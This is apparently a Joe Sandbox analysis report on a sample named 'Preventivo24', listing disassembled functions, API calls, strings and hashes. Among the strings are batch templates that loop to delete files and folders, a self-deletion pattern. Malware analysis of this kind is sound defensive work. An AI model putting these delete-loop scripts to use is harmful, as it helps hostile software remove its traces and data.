Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00B22C9E
kernel32, xrefs: 00B22F1E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
API String ID: 2654979339-3583743485
Opcode ID: f56d4af688cf8e781b6120d293e5a3c657ae245755ccd2e52af1174fa91af036
Instruction ID: 36f8ed0f1fff766fca8493f75a817809e4b959771c806fb020965adc171dcb35
Opcode Fuzzy Hash: f56d4af688cf8e781b6120d293e5a3c657ae245755ccd2e52af1174fa91af036
Instruction Fuzzy Hash: 92A16DB5900728AFDB20DF20ED45BE9B7B5FB44711F0002E9E509E72A0EB759A98CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B5BB40 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 423
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5C950: ResetEvent.KERNEL32(?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C,?,00000000), ref: 00B5C963
Part of subcall function 00B5C950: InternetConnectW.WININET(00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92,00B5BB92), ref: 00B5C986
Part of subcall function 00B5C950: GetLastError.KERNEL32(?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C,?,00000000), ref: 00B5C990
Part of subcall function 00B5C950: WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00B5BB92,?,?,?,?,?,00000003,00000000,26FBC52C), ref: 00B5C9CA

ResetEvent.KERNEL32(?,?,?,?,?,?,00000003,00000000,26FBC52C), ref: 00B5BC1B
HttpOpenRequestW.WININET(?,?,?,HTTP/1.0,00CA2730,00CBF120,?,?), ref: 00B5BC3E

Strings

HTTP/1.0, xrefs: 00B5BC34

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: EventReset$ConnectErrorHttpInternetLastObjectOpenRequestSingleWait
String ID: HTTP/1.0
API String ID: 3963449110-401229808
Opcode ID: 5477bc7df10059b3d29e1562628db999a0ece9e32b5317c4c1cf6d1bda92b152
Instruction ID: 13a042a1c22e88c5f480c30c52ede54c6e8e4b06c9e065933771f51407415d72
Opcode Fuzzy Hash: 5477bc7df10059b3d29e1562628db999a0ece9e32b5317c4c1cf6d1bda92b152
Instruction Fuzzy Hash: 69124570900359DFDB21CFA8C848BAEBBF6FF08315F144199E819AB291D774A948CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B02870 Relevance: 31.9, APIs: 8, Strings: 10, Instructions: 355
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

GetModuleFileNameW.KERNEL32(00000000,?,00000104,26FBC52C,00000000,?,?,?,000000FF), ref: 00B029A5
GetModuleHandleW.KERNEL32(kernel32,.local,?,?,?,?,000000FF), ref: 00B02A4C
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00B02A8B
SetSearchPathMode.KERNEL32 ref: 00B02ABE
GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00B02AED
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B02B4F
SetDefaultDllDirectories.KERNELBASE ref: 00B02B82

Part of subcall function 00AD73D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD7412

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

FreeLibrary.KERNEL32(?,26FBC52C,00000000,00C11B00,000000FF,?,000000E1,80004005,?,?,000000FF), ref: 00B02DF4

Part of subcall function 00B084F0: EnterCriticalSection.KERNEL32(00D3001C,26FBC52C), ref: 00B0852F
Part of subcall function 00B084F0: DestroyWindow.USER32(00000000), ref: 00B0854D
Part of subcall function 00B084F0: LeaveCriticalSection.KERNEL32(00D3001C), ref: 00B08596

Strings

SetDllDirectory, xrefs: 00B02AE7
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00B028F4
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00B028F9, 00B02901
kernel32.dll, xrefs: 00B02C67
SetDefaultDllDirectories, xrefs: 00B02B49
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00B02917, 00B0291F
@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00B02912
.local, xrefs: 00B02A26
SetSearchPathMode, xrefs: 00B02A85
kernel32, xrefs: 00B02A47

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressProc$CriticalHeapModuleSection$AllocateDefaultDestroyDirectoriesDirectoryEnterFileFreeHandleLeaveLibraryModeNamePathProcessSearchSystemWindow
String ID: .local$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
API String ID: 863123761-2126665378
Opcode ID: dc889b9625bf1d3afbe4a58e7569878277e8315b88d7dd02710487d099139011
Instruction ID: aefc84022cf31161e2613711df93a28b38c2bc0e8151bf96b126ce084bedaa72
Opcode Fuzzy Hash: dc889b9625bf1d3afbe4a58e7569878277e8315b88d7dd02710487d099139011
Instruction Fuzzy Hash: 72E18BB0501688DFCF20CF64DC49BEE7BA8FB05314F104259E919AB391DBB09A0CCBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B3AF70 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00B3B056
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00B3B08A

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Strings

%hu, xrefs: 00B3BD57
Code returned to Windows by setup:, xrefs: 00B3BB17
Language selected programatically for UI:, xrefs: 00B3C047
Languages of setup:, xrefs: 00B3CD6A
Language of a related product is:, xrefs: 00B3BF70
AI_BOOTSTRAPPERLANGS, xrefs: 00B3CA8F, 00B3CAA1, 00B3CAAB
Advinst_Extract_, xrefs: 00B3AFED, 00B3B002, 00B3B00C
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 00B3BEF4
A valid language was received from commnad line. This is:, xrefs: 00B3BD1D
Language used for UI:, xrefs: 00B3C0DE
Software\Caphyon\Advanced Installer\, xrefs: 00B3BEE0

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$FindHeapProcessResource
String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
API String ID: 2083075878-297406034
Opcode ID: 1dd62fd6ccb7a7c79320bb455410cca7e1693ca11cd43a1edd8d9010e9000982
Instruction ID: 6d1d0729e46a69de0833f7333baa31eab2e9f9c72f4316f6280274ed693191a3
Opcode Fuzzy Hash: 1dd62fd6ccb7a7c79320bb455410cca7e1693ca11cd43a1edd8d9010e9000982
Instruction Fuzzy Hash: 12E1BC319006589BDB15DB28CC55BAEBBF5EF48320F1442D9E919A73E1DB30AE41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B3ABB0 Relevance: 23.9, APIs: 10, Strings: 3, Instructions: 1176threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00B3ADC4
SetLastError.KERNEL32(0000000E), ref: 00B3ADE1
GetCurrentThreadId.KERNEL32 ref: 00B3ADF9
EnterCriticalSection.KERNEL32(00D3536C), ref: 00B3AE16
LeaveCriticalSection.KERNEL32(00D3536C), ref: 00B3AE39
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00B3B056
SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00B3B2E3

Part of subcall function 00B63BE0: CloseHandle.KERNEL32(?,26FBC52C,?,00000010,?,00000000,00C63163,000000FF,?,00B3F542,00000000,00000000,00000000,00000001,?,0000000D), ref: 00B63C1A

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00B3B08A

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,00000000,00000000,00000000,?,?,00B47294,00CA47A0), ref: 00B04468
Part of subcall function 00B04450: MultiByteToWideChar.KERNEL32(00000003,00000000,00B47294,000000FF,?,-00000001,?,00B47294,00CA47A0), ref: 00B0449A

DialogBoxParamW.USER32(000007D0,00000000,00A65290,00000000), ref: 00B3AE56

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Strings

Code returned to Windows by setup:, xrefs: 00B3BB17
FILES.7z, xrefs: 00B3B5DF
Advinst_Extract_, xrefs: 00B3AFED, 00B3B002, 00B3B00C

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$CriticalHeapSection$ActiveAllocateCloseCurrentDialogEnterErrorEventFindHandleLastLeaveParamProcessResourceThreadWindow
String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z
API String ID: 1122345507-2771609608
Opcode ID: e6fa371ef593200e1cba6c866a41d198f2463de12dd81d1eb9ae64357ffe7362
Instruction ID: 2a992575d5a224baaffb6fc120ea98e5ec37de430c80da203915e3386a2dbfed
Opcode Fuzzy Hash: e6fa371ef593200e1cba6c866a41d198f2463de12dd81d1eb9ae64357ffe7362
Instruction Fuzzy Hash: D8A28C309002488FDB15DB68C855BEEBBF5EF48310F2482D9E519A73A2DB74AE45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B634D0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 371
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

SetWindowTextW.USER32(00000000,?), ref: 00B63746
GetDlgItem.USER32(00000000,000007D1), ref: 00B6375D
SendMessageW.USER32(00000000,000000D2,00000000,00000000), ref: 00B6376F
GetDlgItem.USER32(00000000,000007D1), ref: 00B637B8
GetDlgItem.USER32(00000000,0000042D), ref: 00B637C8
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B637D8
SendMessageW.USER32(00000000,000000CC,?,00000000), ref: 00B637F4
EndDialog.USER32(00000000,00000002), ref: 00B63821
GetDlgItem.USER32(00000000,000007D1), ref: 00B63853
EndDialog.USER32(00000000,00000001), ref: 00B638E0

Strings

PackageCode, xrefs: 00B635FA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Item$MessageSend$Dialog$HeapProcessTextWindow
String ID: PackageCode
API String ID: 374704001-1525858878
Opcode ID: 5949b5324ea3eb62beae28a217b45c75de21dc97bde99c9b5b7c9aded13404fd
Instruction ID: 53ea99e1ba8eba318e38fb7a402fb92c95dd9711520e33e5e5f0e6d46950756c
Opcode Fuzzy Hash: 5949b5324ea3eb62beae28a217b45c75de21dc97bde99c9b5b7c9aded13404fd
Instruction Fuzzy Hash: A0D1FF71A00606AFDB119B68CC49BAEB7E5FF44710F104269F916E73A0DB79AE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B4B9C0 Relevance: 18.2, APIs: 12, Instructions: 190
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 00B4B9FD
SetLastError.KERNEL32(0000000E,?,?,?), ref: 00B4BA3A
GetCurrentThreadId.KERNEL32 ref: 00B4BAC5
SetWindowTextW.USER32(?,00000000), ref: 00B4BB54
GetDlgItem.USER32(?,000003E9), ref: 00B4BB62
SetWindowTextW.USER32(00000000,?), ref: 00B4BB6E

Part of subcall function 00B41DC0: GetDlgItem.USER32(?,00000002), ref: 00B41DDD
Part of subcall function 00B41DC0: GetWindowRect.USER32(00000000,?), ref: 00B41DF3
Part of subcall function 00B41DC0: ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00B4BA1D), ref: 00B41E08
Part of subcall function 00B41DC0: InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00B4BA1D), ref: 00B41E13
Part of subcall function 00B41DC0: GetDlgItem.USER32(?,000003E9), ref: 00B41E21
Part of subcall function 00B41DC0: GetWindowRect.USER32(00000000,?), ref: 00B41E37
Part of subcall function 00B41DC0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00B41E76

GetDlgItem.USER32(?,00000002), ref: 00B4BBFE
SetWindowTextW.USER32(00000000,00000000), ref: 00B4BC06

Part of subcall function 009FC3A0: RaiseException.KERNEL32(?,?,00000000,00000000,00B084DC,C0000005,00000001,26FBC52C,00D263B8,054D0D10,?,00D3002C,00D263B8,00C11F80,000000FF), ref: 009FC3AC

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Window$Item$RectText$ActiveAllocateCurrentErrorExceptionHeapInvalidateLastRaiseShowThread
String ID:
API String ID: 1085195845-0
Opcode ID: 3aae592452ac5a6426fefd207606777a0862717900cdcbd413ec6112d28446a5
Instruction ID: b51548f07fe0f3a507e5a64cd40034bed7dfbae8502b86511fa2dcacd575a986
Opcode Fuzzy Hash: 3aae592452ac5a6426fefd207606777a0862717900cdcbd413ec6112d28446a5
Instruction Fuzzy Hash: 21719A71900709EFCB11DF69DC48B6EBBF4FF04310F148669E525A72A0DB70AA44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009F33C0 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 263
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,?), ref: 009F34B7
GetProcAddress.KERNEL32(00000000), ref: 009F34BE
CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,10000000,00000001,S-1-5-18,10000000,00000001), ref: 009F35B7

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

GetWindowsDirectoryW.KERNEL32(?,00000104,26FBC52C,?,?), ref: 009F3504
GetTempPathW.KERNEL32(00000104,?,26FBC52C,?,?), ref: 009F35DA

Part of subcall function 00BEAB04: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,009EB517,00D2F53C,00C75440), ref: 00BEAB0E
Part of subcall function 00BEAB04: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,009EB517,00D2F53C,00C75440), ref: 00BEAB41
Part of subcall function 00BEAB04: WakeAllConditionVariable.KERNEL32(00D2E924,?,009EB517,00D2F53C,00C75440), ref: 00BEAB4C

Strings

S-1-5-18, xrefs: 009F3559
GetTempPath2W, xrefs: 009F34AD
Kernel32.dll, xrefs: 009F34B2
\SystemTemp\, xrefs: 009F350A
S-1-5-32-544, xrefs: 009F356A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireDirectoryRelease$AddressConditionCreateHandleModulePathProcTempVariableWakeWindows
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
API String ID: 846588460-595641723
Opcode ID: 8c52fa1bcc8b73c6756dfe500245630aa97325cd7d27930ea569203972dedfb1
Instruction ID: 872e97cb610861fe3cc257025a729657d9ab7ce6fe70cd82df0d88d772b1b54b
Opcode Fuzzy Hash: 8c52fa1bcc8b73c6756dfe500245630aa97325cd7d27930ea569203972dedfb1
Instruction Fuzzy Hash: 7DA1C3B1D00258EBDB20DFA4DC89BEDB7B8EF44714F1042A9E509A7291DBB46F84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00BE9FCC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DecodePointer.KERNEL32(?,?,?,00BEA312,00D2E8E4,?,?,?,00B63A0D,?,?,?,00000001,?), ref: 00BE9FDE
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,00BEA312,00D2E8E4,?,?,?,00B63A0D,?,?,?,00000001), ref: 00BE9FF3
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00BEA06F

Strings

AtlThunk_FreeData, xrefs: 00BEA049
atlthunk.dll, xrefs: 00BE9FEE
AtlThunk_AllocateData, xrefs: 00BEA004
AtlThunk_InitData, xrefs: 00BEA01B
AtlThunk_DataToCode, xrefs: 00BEA032

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
